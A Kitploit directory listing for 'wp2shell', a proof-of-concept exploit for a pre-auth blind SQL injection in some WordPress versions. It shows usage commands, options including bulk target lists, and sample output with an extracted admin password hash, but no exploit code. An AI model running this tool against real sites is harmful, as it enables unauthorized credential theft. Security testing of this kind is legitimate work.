Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-63030 — CVE-2026-63030 (wp2shell) POC. | Kitploit
Tools/GitHubGitHub/4minx/cve-2026-63030
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHub4minx/cve-2026-63030

CVE-2026-63030

CVE-2026-63030 (wp2shell) POC.

View Repository
82121 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-63030: wp2shell

WordPress Batch API Desynchronization SQL Injection Exploit

Proof of Concept tool for extracting users and password hashes via the CVE-2026-63030 (wp2shell) vulnerability.


Vulnerability Information

  • CVE: CVE-2026-63030 (wp2shell)
  • Companion CVE: CVE-2026-60137
  • Type: Pre-Auth Blind SQL Injection
  • Affected: WordPress 6.9.0–6.9.4, 7.0.0–7.0.1
  • Fixed: 6.9.5, 7.0.2+

Usage

root@kitploit:~
python POC.py <target_url> [options]

Basic usage

root@kitploit:~
python POC.py --rest-route http://target.com

Options

ArgumentDescriptionDefault
targetSingle target URL-
-l, --listFile with list of targets (one per line)-
--prefixDatabase table prefixwp_
--rest-routeUse ?rest_route=Disabled
--timeoutRequest timeout (seconds)30
--proxyHTTP proxy (Burp/ZAP compatible)None
--max-lenMaximum extraction length255

Example output:

root@kitploit:~
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553


References

  • Penligent Analysis - CVE-2026-63030 wp2shell
  • Rapid7 Labs - CVE-2026-63030: wp2shell a Critical Remote Code Execution Vulnerability in WordPress Core
  • WordPress 7.0.2 Security Release
Download Tool